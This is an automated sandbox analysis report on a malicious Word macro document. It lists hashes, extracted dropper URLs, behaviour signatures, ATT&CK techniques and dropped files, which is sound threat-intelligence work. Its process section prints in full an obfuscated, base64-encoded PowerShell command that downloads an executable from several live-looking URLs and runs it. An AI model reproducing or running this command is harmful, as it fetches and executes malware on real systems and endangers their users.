c938e12aa898228c05c7f6257ebea9c6b22b9d842573043edef70cc5e2ef21ac

General

Target

a5d076e196edd1e2271ff2bc178cc6c0_JaffaCakes118.doc
Size

96KB
MD5

a5d076e196edd1e2271ff2bc178cc6c0
SHA1

e2b3a98bb2844865890bf7133621acc11c485c33
SHA256

c938e12aa898228c05c7f6257ebea9c6b22b9d842573043edef70cc5e2ef21ac
SHA512

5b0dd7d0db62956323717d4f345a0e3400fddf5043af816073d83a77fe68a40041b3a78530e28233c586ed17594f805431c2bd062a1c779d3e6d91251ed78529
SSDEEP

1536:VDMeOY5C6OJsdBpZWa+a9KQJJIJOO3qBYxyQiVz9wRQWR:V4eOY5CTsdAqIgUqyxyQiVRwGWR

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://sandraadamson.com/wp-admin/eb4hsq5634/

exe.dropper

http://qureshijewellery.com/css/ly399/

exe.dropper

http://acbay.com/uploaded/i63tw3769/

exe.dropper

http://steponmephoto.com/thewahligfour/x64157/

exe.dropper

http://sociallysavvyseo.com/PinnacleDynamicServices/of18k67/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4628	2332	powErSHell.exe	83

Blocklisted process makes network request 5 IoCs

flow	pid	Process
15	4628	powErSHell.exe
20	4628	powErSHell.exe
22	4628	powErSHell.exe
23	4628	powErSHell.exe
26	4628	powErSHell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
2280	WINWORD.EXE
2280	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4628	powErSHell.exe
4628	powErSHell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4628	powErSHell.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
2280	WINWORD.EXE
2280	WINWORD.EXE
2280	WINWORD.EXE
2280	WINWORD.EXE
2280	WINWORD.EXE
2280	WINWORD.EXE
2280	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a5d076e196edd1e2271ff2bc178cc6c0_JaffaCakes118.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2280

C:\Windows\System32\WindowsPowerShell\v1.0\powErSHell.exe
powErSHell -e JABwADkAMAA4ADYAOAA9ACcAbAA5ADYAMgAyADgAOQAnADsAJABYAF8AOQAxADIANwA2ADkAIAA9ACAAJwA3ADUANAAnADsAJAB6ADkANQAzADUAOAA9ACcAdgA1ADQANQA2ADgAMwA4ACcAOwAkAFEAOAA3ADQAOAAyAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABYAF8AOQAxADIANwA2ADkAKwAnAC4AZQB4AGUAJwA7ACQATQA3ADIAXwA0ADIAPQAnAFkANAA5ADEAMwA1AF8AJwA7ACQAdwA0ADIANwA5ADAAXwA4AD0AJgAoACcAbgAnACsAJwBlAHcALQAnACsAJwBvAGIAagBlAGMAdAAnACkAIABOAEUAVAAuAHcAYABlAEIAYwBgAGwAaQBgAGUAbgBUADsAJABIADUANgA4ADYAOAA9ACcAaAB0AHQAcABzADoALwAvAHMAYQBuAGQAcgBhAGEAZABhAG0AcwBvAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGUAYgA0AGgAcwBxADUANgAzADQALwBAAGgAdAB0AHAAOgAvAC8AcQB1AHIAZQBzAGgAaQBqAGUAdwBlAGwAbABlAHIAeQAuAGMAbwBtAC8AYwBzAHMALwBsAHkAMwA5ADkALwBAAGgAdAB0AHAAOgAvAC8AYQBjAGIAYQB5AC4AYwBvAG0ALwB1AHAAbABvAGEAZABlAGQALwBpADYAMwB0AHcAMwA3ADYAOQAvAEAAaAB0AHQAcAA6AC8ALwBzAHQAZQBwAG8AbgBtAGUAcABoAG8AdABvAC4AYwBvAG0ALwB0AGgAZQB3AGEAaABsAGkAZwBmAG8AdQByAC8AeAA2ADQAMQA1ADcALwBAAGgAdAB0AHAAOgAvAC8AcwBvAGMAaQBhAGwAbAB5AHMAYQB2AHYAeQBzAGUAbwAuAGMAbwBtAC8AUABpAG4AbgBhAGMAbABlAEQAeQBuAGEAbQBpAGMAUwBlAHIAdgBpAGMAZQBzAC8AbwBmADEAOABrADYANwAvACcALgBzAFAAbABJAFQAKAAnAEAAJwApADsAJABHADAANgA1ADIAOAAwADkAPQAnAFMAMwAwAF8ANgA2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABaAF8AXwA1ADIAXwBfACAAaQBuACAAJABIADUANgA4ADYAOAApAHsAdAByAHkAewAkAHcANAAyADcAOQAwAF8AOAAuAEQAbwBXAE4ATABPAGEARABGAEkAbABlACgAJABaAF8AXwA1ADIAXwBfACwAIAAkAFEAOAA3ADQAOAAyACkAOwAkAEMAMAAxADUANAAwADEAPQAnAHUAOQAyAF8ANQAxAF8AMgAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAFEAOAA3ADQAOAAyACkALgBsAEUATgBHAHQASAAgAC0AZwBlACAAMwA2ADEANgA5ACkAIAB7ACYAKAAnAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ASQB0AGUAJwArACcAbQAnACkAIAAkAFEAOAA3ADQAOAAyADsAJABGAF8ANAAzADkAXwAxADIAPQAnAE8ANwA4ADAAMAA3ADkAJwA7AGIAcgBlAGEAawA7ACQAaQA1ADAAMABfAF8ANQA9ACcASAAwADAAOAAwADkANQAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGYANAAwADAANwA1ADcAMwA9ACcAaQA2ADIANQAzAF8AJwA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\754.exe

Filesize
58KB

MD5
a9043c10636de2d530476940d9f066d5

SHA1
cae2c73bf0aa42dcc08114f116781425431a3d13

SHA256
81153269dbc74ed5eb4a1c6a6b25ba5fd4194144e54c8fe1f9a5d5adf17dfbc4

SHA512
8a4e45aabcdce0bd2d97956b1ea5e416f194554a6f22c5d8e5864f1868b130c7bbb6fdce6bd5c2977bbab19c1d60a6252dcbe95f7a3036e7cb83b931690cf915

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCD870A.tmp\iso690.xsl

Filesize
263KB

MD5
ff0e07eff1333cdf9fc2523d323dd654

SHA1
77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

SHA256
3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

SHA512
b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kpqdi2hn.ghp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2280-8-0x00007FFCD70D0000-0x00007FFCD72C5000-memory.dmp

Filesize
2.0MB

Download
memory/2280-34-0x00007FFCD70D0000-0x00007FFCD72C5000-memory.dmp

Filesize
2.0MB

Download
memory/2280-0-0x00007FFC97150000-0x00007FFC97160000-memory.dmp

Filesize
64KB

Download
memory/2280-6-0x00007FFCD70D0000-0x00007FFCD72C5000-memory.dmp

Filesize
2.0MB

Download
memory/2280-7-0x00007FFCD70D0000-0x00007FFCD72C5000-memory.dmp

Filesize
2.0MB

Download
memory/2280-9-0x00007FFCD70D0000-0x00007FFCD72C5000-memory.dmp

Filesize
2.0MB

Download
memory/2280-5-0x00007FFC97150000-0x00007FFC97160000-memory.dmp

Filesize
64KB

Download
memory/2280-13-0x00007FFCD70D0000-0x00007FFCD72C5000-memory.dmp

Filesize
2.0MB

Download
memory/2280-14-0x00007FFCD70D0000-0x00007FFCD72C5000-memory.dmp

Filesize
2.0MB

Download
memory/2280-12-0x00007FFCD70D0000-0x00007FFCD72C5000-memory.dmp

Filesize
2.0MB

Download
memory/2280-11-0x00007FFCD70D0000-0x00007FFCD72C5000-memory.dmp

Filesize
2.0MB

Download
memory/2280-10-0x00007FFCD70D0000-0x00007FFCD72C5000-memory.dmp

Filesize
2.0MB

Download
memory/2280-15-0x00007FFC94F90000-0x00007FFC94FA0000-memory.dmp

Filesize
64KB

Download
memory/2280-16-0x00007FFC94F90000-0x00007FFC94FA0000-memory.dmp

Filesize
64KB

Download
memory/2280-26-0x00007FFCD70D0000-0x00007FFCD72C5000-memory.dmp

Filesize
2.0MB

Download
memory/2280-27-0x00007FFCD70D0000-0x00007FFCD72C5000-memory.dmp

Filesize
2.0MB

Download
memory/2280-1-0x00007FFC97150000-0x00007FFC97160000-memory.dmp

Filesize
64KB

Download
memory/2280-579-0x00007FFCD70D0000-0x00007FFCD72C5000-memory.dmp

Filesize
2.0MB

Download
memory/2280-33-0x00007FFCD70D0000-0x00007FFCD72C5000-memory.dmp

Filesize
2.0MB

Download
memory/2280-576-0x00007FFC97150000-0x00007FFC97160000-memory.dmp

Filesize
64KB

Download
memory/2280-2-0x00007FFC97150000-0x00007FFC97160000-memory.dmp

Filesize
64KB

Download
memory/2280-3-0x00007FFCD716D000-0x00007FFCD716E000-memory.dmp

Filesize
4KB

Download
memory/2280-578-0x00007FFC97150000-0x00007FFC97160000-memory.dmp

Filesize
64KB

Download
memory/2280-76-0x00007FFCD70D0000-0x00007FFCD72C5000-memory.dmp

Filesize
2.0MB

Download
memory/2280-4-0x00007FFC97150000-0x00007FFC97160000-memory.dmp

Filesize
64KB

Download
memory/2280-512-0x00007FFCD70D0000-0x00007FFCD72C5000-memory.dmp

Filesize
2.0MB

Download
memory/2280-555-0x00007FFCD70D0000-0x00007FFCD72C5000-memory.dmp

Filesize
2.0MB

Download
memory/2280-556-0x00007FFCD70D0000-0x00007FFCD72C5000-memory.dmp

Filesize
2.0MB

Download
memory/2280-575-0x00007FFC97150000-0x00007FFC97160000-memory.dmp

Filesize
64KB

Download
memory/2280-577-0x00007FFC97150000-0x00007FFC97160000-memory.dmp

Filesize
64KB

Download
memory/4628-73-0x00007FFCD70D0000-0x00007FFCD72C5000-memory.dmp

Filesize
2.0MB

Download
memory/4628-36-0x00000244268D0000-0x00000244268F2000-memory.dmp

Filesize
136KB

Download
memory/4628-35-0x00007FFCD70D0000-0x00007FFCD72C5000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads